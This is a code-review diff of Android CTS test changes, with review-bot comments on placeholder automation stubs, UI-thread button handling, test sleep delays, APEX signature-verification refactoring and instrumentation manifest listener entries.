+ public Boolean automate() throws Exception {
+ return true;
+ }
+}
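Review bot: `automate()` returns `true` unconditionally, so when automation is used the question of whether the launcher default configuration contains a phone shortcut is answered yes without looking at the device. If that is a deliberate placeholder, say so in a class comment, e.g. `// TODO: inspect the launcher; currently always reports the shortcut as present`. Otherwise an automated run can pass on a device that lacks the shortcut. The same applies to `DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation` in the next file.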
diff --git a/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation.java b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation.java
new file mode 100644
index 0000000..d79cc75
--- /dev/null
+++ b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation.java
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+
+package com.google.android.interactive.steps.enterprise.launcher;
+
+import com.android.interactive.Automation;
+import com.android.interactive.annotations.AutomationFor;
+
+@AutomationFor("com.google.android.interactive.steps.enterprise.launcher"
+ + ".DoesLauncherDefaultConfigurationContainSmsShortcutStep")
+public class DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation implements Automation<Boolean> {
+ @Override
+ public Boolean automate() throws Exception {
+ return true;
+ }
+}
diff --git a/common/device-side/interactive/src/main/java/com/android/interactive/Step.java b/common/device-side/interactive/src/main/java/com/android/interactive/Step.java
index abe25f1..faf347d 100644
--- a/common/device-side/interactive/src/main/java/com/android/interactive/Step.java
+++ b/common/device-side/interactive/src/main/java/com/android/interactive/Step.java
@@ -22,6 +22,8 @@
import static com.android.interactive.Automator.AUTOMATION_FILE;
import android.graphics.PixelFormat;
+import android.os.Handler;
+import android.os.Looper;
import android.util.Log;
import android.view.Gravity;
import android.view.LayoutInflater;
@@ -247,27 +249,32 @@
* Adds a button to the interaction prompt.
*/
protected void addButton(String title, Runnable onClick) {
- Button btn = new Button(TestApis.context().instrumentedContext());
- btn.setText(title);
- btn.setOnClickListener(v -> onClick.run());
+ // Push to UI thread to avoid animation issues when adding the button
+ new Handler(Looper.getMainLooper()).post(() -> {
+ Button btn = new Button(TestApis.context().instrumentedContext());
+ btn.setText(title);
+ btn.setOnClickListener(v -> onClick.run());
- GridLayout layout = mInstructionView.findViewById(R.id.buttons);
- layout.addView(btn);
+ GridLayout layout = mInstructionView.findViewById(R.id.buttons);
+ layout.addView(btn);
+ });
}
/**
* Adds small button with a single up/down arrow, used for moving the text box to the
* bottom of the screen in case it covers some critical area of the app
*/
-
protected void addSwapButton() {
- Button btn = new Button(TestApis.context().instrumentedContext());
- // up/down arrow
- btn.setText("\u21F5");
- btn.setOnClickListener(v -> swap());
+ // Push to UI thread to avoid animation issues when adding the button
+ new Handler(Looper.getMainLooper()).post(() -> {
+ Button btn = new Button(TestApis.context().instrumentedContext());
+ // up/down arrow
+ btn.setText("\u21F5");
+ btn.setOnClickListener(v -> swap());
- GridLayout layout = mInstructionView.findViewById(R.id.buttons);
- layout.addView(btn);
+ GridLayout layout = mInstructionView.findViewById(R.id.buttons);
+ layout.addView(btn);
+ });
}
/**
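Review bot: After this change `addButton` and `addSwapButton` contain the same posted block apart from the title and the click action; `addSwapButton` can be reduced to `addButton("\u21F5", this::swap);` with the `// up/down arrow` comment kept. Because the view is now added asynchronously, the runnable reads `mInstructionView` when it executes on the main thread rather than when the method is called. If the prompt can be closed in between (not visible in this hunk), a null check inside the runnable would be needed. A sentence in each Javadoc saying that the button is added asynchronously would help callers that expect it to be present on return.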
diff --git a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java
index aa87d2a..377e089 100644
--- a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java
+++ b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java
@@ -17,15 +17,12 @@
package com.android.cts.appcompat;
import static com.google.common.truth.Truth.assertThat;
-import static org.junit.Assert.assertEquals;
-import static org.junit.Assert.assertTrue;
import android.compat.cts.CompatChangeGatingTestCase;
import com.google.common.collect.ImmutableSet;
import java.util.HashMap;
-import java.util.HashSet;
import java.util.Map;
import java.util.Set;
import java.util.regex.Matcher;
@@ -66,7 +63,7 @@
final long configId = getClass().getCanonicalName().hashCode();
installPackage(Q_TEST_APK, false);
- Thread.currentThread().sleep(100);
+ Thread.currentThread().sleep(200);
setCompatConfig(enabledChanges, disabledChanges, TEST_PKG);
try {
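Review bot: Raising the fixed delay after `installPackage` from 100 to 200 ms (here and in the hunks at -86 and -116) keeps the tests timing-dependent, because nothing in the hunk ties the value to the condition being waited for. A slower device can still reach `setCompatConfig` too early. If the awaited state is observable, poll for it with a timeout. Otherwise, at least add a comment naming what the wait is for, and call the static method directly as `Thread.sleep(200);` rather than through `Thread.currentThread()`. The enclosing test methods start and end outside these hunks.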
@@ -86,7 +83,7 @@
final Set<Long> disabledChanges = ImmutableSet.of();
installPackage(Q_TEST_APK, false);
- Thread.currentThread().sleep(100);
+ Thread.currentThread().sleep(200);
setCompatConfig(enabledChanges, disabledChanges, TEST_PKG);
try {
@@ -116,7 +113,7 @@
final Set<Long> enabledChanges = ImmutableSet.of(SELINUX_LATEST_CHANGES);
final Set<Long> disabledChanges = ImmutableSet.of();
installPackage(R_TEST_APK, false);
- Thread.currentThread().sleep(100);
+ Thread.currentThread().sleep(200);
setCompatConfig(enabledChanges, disabledChanges, TEST_PKG);
try {
diff --git a/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml b/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml
index 4c5734c..9454b60 100644
--- a/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml
+++ b/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml
@@ -27,5 +27,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.server.cts.device.statsd"
android:label="CTS tests of android.os.statsd stats collection">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/appsecurity/res/apexsigverify/build.bazel.examples.apex.minimal.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/build.bazel.examples.apex.minimal.avbpubkey
new file mode 100644
index 0000000..e6ffe58
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/build.bazel.examples.apex.minimal.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.adservices.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.adservices.avbpubkey
new file mode 100644
index 0000000..4288519
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.adservices.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.product.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.product.test.avbpubkey
new file mode 100644
index 0000000..bef1df6
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.product.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system.test.avbpubkey
new file mode 100644
index 0000000..ef0438e
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system_ext.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system_ext.test.avbpubkey
new file mode 100644
index 0000000..0d978b8
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system_ext.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.vendor.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.vendor.test.avbpubkey
new file mode 100644
index 0000000..3ad68fc
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.vendor.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.appsearch.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.appsearch.avbpubkey
new file mode 100644
index 0000000..4e5acae
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.appsearch.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.btservices.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.btservices.avbpubkey
new file mode 100644
index 0000000..969211f
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.btservices.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.car.framework.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.car.framework.avbpubkey
new file mode 100644
index 0000000..0b720b8
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.car.framework.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.cellbroadcast.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.cellbroadcast.avbpubkey
new file mode 100644
index 0000000..a7f87c3
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.cellbroadcast.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.compos.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.compos.avbpubkey
new file mode 100644
index 0000000..3f09680
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.compos.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.extservices.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.extservices.avbpubkey
new file mode 100644
index 0000000..f37d3e4
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.extservices.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.geotz.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.geotz.avbpubkey
new file mode 100644
index 0000000..f705184
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.geotz.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.core_permissions.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.core_permissions.avbpubkey
new file mode 100644
index 0000000..b9164fb
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.core_permissions.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.power.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.power.avbpubkey
new file mode 100644
index 0000000..3b6411d
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.power.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.sensors.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.sensors.avbpubkey
new file mode 100644
index 0000000..98dfb71
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.sensors.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.thermal.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.thermal.avbpubkey
new file mode 100644
index 0000000..8f7cf72
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.thermal.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.usb.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.usb.avbpubkey
new file mode 100644
index 0000000..0302d63
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.usb.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.vibrator.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.vibrator.avbpubkey
new file mode 100644
index 0000000..a6ca630
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.vibrator.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.wifi.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.wifi.avbpubkey
new file mode 100644
index 0000000..63fba77
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.wifi.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.mediaprovider.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.mediaprovider.avbpubkey
new file mode 100644
index 0000000..c1b8dda
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.mediaprovider.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.modules.updatablesharedlibs.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.modules.updatablesharedlibs.avbpubkey
new file mode 100644
index 0000000..e95ecbe
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.modules.updatablesharedlibs.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.ondevicepersonalization.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.ondevicepersonalization.avbpubkey
new file mode 100644
index 0000000..4e74bb1
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.ondevicepersonalization.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.os.statsd.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.os.statsd.avbpubkey
new file mode 100644
index 0000000..d78af8b
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.os.statsd.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.permission.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.permission.avbpubkey
new file mode 100644
index 0000000..9eaf852
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.permission.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.rkpd.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.rkpd.avbpubkey
new file mode 100644
index 0000000..94d4e70
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.rkpd.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.scheduling.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.scheduling.avbpubkey
new file mode 100644
index 0000000..63bbfab
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.scheduling.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.uwb.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.uwb.avbpubkey
new file mode 100644
index 0000000..ccdd6d6
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.uwb.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.drv2624.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.drv2624.avbpubkey
new file mode 100644
index 0000000..479a868
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.drv2624.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.sunfish.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.sunfish.avbpubkey
new file mode 100644
index 0000000..497aa29
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.sunfish.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.virt.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.virt.avbpubkey
new file mode 100644
index 0000000..79ab8db
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.virt.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.vndk.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.vndk.avbpubkey
new file mode 100644
index 0000000..f408d2b
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.vndk.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.wifi.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.wifi.avbpubkey
new file mode 100644
index 0000000..e98ee34
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.wifi.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.google.cf.apex.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.google.cf.apex.avbpubkey
new file mode 100644
index 0000000..1fc39e1
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.google.cf.apex.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.google.emulated.camera.provider.hal.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.google.emulated.camera.provider.hal.avbpubkey
new file mode 100644
index 0000000..0c28e11
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.google.emulated.camera.provider.hal.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java
index b73c8d7..844111e 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java
@@ -30,14 +30,13 @@
import com.android.tradefed.util.FileUtil;
import com.android.tradefed.util.ZipUtil;
-import org.hamcrest.CustomTypeSafeMatcher;
-import org.hamcrest.Matcher;
+import com.google.common.truth.Expect;
+
import org.junit.AfterClass;
import org.junit.Before;
import org.junit.Ignore;
import org.junit.Rule;
import org.junit.Test;
-import org.junit.rules.ErrorCollector;
import org.junit.rules.TestRule;
import org.junit.runner.Description;
import org.junit.runner.RunWith;
@@ -87,7 +86,7 @@
private ITestDevice mDevice;
@Rule
- public final ErrorCollector mErrorCollector = new ErrorCollector();
+ public final Expect mExpect = Expect.create();
@Before
public void setUp() throws Exception {
@@ -153,8 +152,8 @@
while (it.hasNext()) {
final File wellKnownKey = (File) it.next();
- verifyPubKey("must not use well known pubkey", pubKeyFile,
- pubkeyShouldNotEqualTo(wellKnownKey));
+ mExpect.withMessage(entry.getKey() + " must not use well known pubkey")
+ .that(areKeysMatching(pubKeyFile, wellKnownKey)).isFalse();
}
}
}
@@ -192,7 +191,8 @@
try {
apexes = mDevice.getActiveApexes();
for (ITestDevice.ApexInfo ap : apexes) {
- if (!ap.sourceDir.startsWith("/data/")) {
+ // Compressed APEXes on /system are decompressed to /data/apex/decompressed
+ if (!ap.sourceDir.startsWith("/data/apex/active")) {
mPreloadedApexPathMap.put(ap.name, ap.sourceDir);
}
}
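Review bot: The new test `startsWith("/data/apex/active")` is broader than the comment's stated intent of admitting `/data/apex/decompressed`: every active APEX whose `sourceDir` is anywhere else under `/data` now also lands in `mPreloadedApexPathMap`. The prefix also has no trailing separator, so a sibling directory whose name merely begins with `active` would be excluded as well. If only decompressed system APEXes are meant to count as preloaded, keep the old exclusion and add the one exception: `if (!ap.sourceDir.startsWith("/data/") || ap.sourceDir.startsWith("/data/apex/decompressed/")) {`. How the map is consumed is outside this hunk, so confirm which paths the signature check is supposed to cover.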
@@ -279,24 +279,14 @@
assertThat(mWellKnownKeyFileList).isNotEmpty();
}
- private <T> void verifyPubKey(String reason, T actual, Matcher<? super T> matcher) {
- mErrorCollector.checkThat(reason, actual, matcher);
- }
-
- private static Matcher<File> pubkeyShouldNotEqualTo(File wellknownKey) {
- return new CustomTypeSafeMatcher<File>("must not match well known key ") {
- @Override
- protected boolean matchesSafely(File actual) {
- boolean isMatchWellknownKey = false;
- try {
- isMatchWellknownKey = FileUtil.compareFileContents(actual, wellknownKey);
- } catch (IOException e) {
- e.printStackTrace();
- }
- // Assert fail if the keys matched
- return !isMatchWellknownKey;
- }
- };
+ private static boolean areKeysMatching(File pubkey, File wellknownKey) {
+ try {
+ return FileUtil.compareFileContents(pubkey, wellknownKey);
+ } catch (IOException e) {
+ throw new AssertionError(
+ "Failed to compare " + pubkey.getAbsolutePath() + " and "
+ + wellknownKey.getAbsolutePath());
+ }
}
/**
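Review bot: The `catch (IOException e)` in `areKeysMatching` builds the `AssertionError` without the caught exception, so the report names the two files but not why the comparison failed. Pass it as the cause by ending the constructor call with `+ wellknownKey.getAbsolutePath(), e);`. This error is raised while evaluating the argument to `mExpect...that(...)` in the earlier hunk, so it aborts the key loop immediately instead of being collected with the other expectations. That is probably the right behaviour for an unreadable key file, but a one-line comment on the method would make it explicit.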
diff --git a/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml
index 15d382b..5331c28 100644
--- a/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml
+++ b/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml
@@ -24,5 +24,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.appsecurity.cts.apkveritytestapp"
android:label="CTS test app of apk verity">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>/>
</manifest>
diff --git a/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml b/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml
index 8b3e7e4..b582828 100755
--- a/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml
+++ b/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml
@@ -24,5 +24,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.compilation.cts.appusingotherapp"
android:label="An instrumentation test that uses another app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/hostsidetests/compilation/status_checker_app/AndroidManifest.xml b/hostsidetests/compilation/status_checker_app/AndroidManifest.xml
index 3c53636..9c2a878 100755
--- a/hostsidetests/compilation/status_checker_app/AndroidManifest.xml
+++ b/hostsidetests/compilation/status_checker_app/AndroidManifest.xml
@@ -20,5 +20,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.compilation.cts.statuscheckerapp"
android:label="An instrumentation test that checks optimization status">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml b/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml
index a1ee42c..5b19966 100644
--- a/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml
@@ -51,6 +51,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="Delegated Cert Installer CTS test"
android:targetPackage="com.android.cts.certinstaller">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml
index e81c523..b6ebb20 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml
@@ -43,5 +43,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="Profile and Device Owner CTS Tests API 23"
android:targetPackage="com.android.cts.deviceandprofileowner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml
index c22cb2f..abe12e1 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml
@@ -39,5 +39,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="Profile and Device Owner CTS Tests"
android:targetPackage="com.android.cts.deviceandprofileowner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml
index efd7260..07d5bd0 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml
@@ -39,5 +39,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="Profile and Device Owner CTS Tests"
android:targetPackage="com.android.cts.deviceandprofileowner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml
index ad4ec40..caafec7 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml
@@ -148,5 +148,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="Profile and Device Owner CTS Tests"
android:targetPackage="com.android.cts.deviceandprofileowner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml
index 602f9ee..ed5bf39 100644
--- a/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml
@@ -98,5 +98,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.cts.deviceowner"
android:label="Device Owner CTS tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml b/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml
index 8f842a2..782b25e 100644
--- a/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml
@@ -74,5 +74,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony.cts.sms.simplesmsapp">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml b/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml
index c7088b2..f63f46e 100644
--- a/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml
@@ -40,5 +40,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.cts.testime">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml b/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml
index 6a863ad..e2b1268 100644
--- a/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml
+++ b/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml
@@ -45,5 +45,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.appwidget.cts"
android:label="CTS Tests for the dumpsys protobuf protocol">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
